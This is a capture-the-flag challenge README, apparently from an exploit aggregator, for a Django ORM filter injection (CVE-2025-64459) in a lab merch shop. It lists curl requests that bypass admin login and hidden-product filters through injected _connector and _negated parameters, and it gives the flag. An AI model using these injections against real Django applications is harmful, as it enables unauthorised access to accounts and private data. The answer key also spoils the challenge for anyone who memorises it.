Share
## https://sploitus.com/exploit?id=8E00D512-AF9D-5F35-87F7-6B494B2695C0
# CTF Challenge: Django ORM Injection (CVE-2025-64459)

**Category:** Web Security  
**Difficulty:** Medium  
**Vulnerability:** CVE-2025-64459 - Django ORM Filter Injection

## ๐Ÿ“ Description
> We built a secure merch shop with admin panel. Can you bypass the authentication and find the private admin note

**URL:** http://YOUR_SERVER:6008

## ๐Ÿš€ Deployment
```bash
cd web_django_cve
docker-compose up --build -d
```

## ๐ŸŽฏ Exploits (CVE-2025-64459)

### Auth Bypass (/login/)
```bash
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
```

### Product Filter Bypass (/)
```bash
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"
```

## ๐Ÿ Flag

lol-you-here_then-you_exploited_me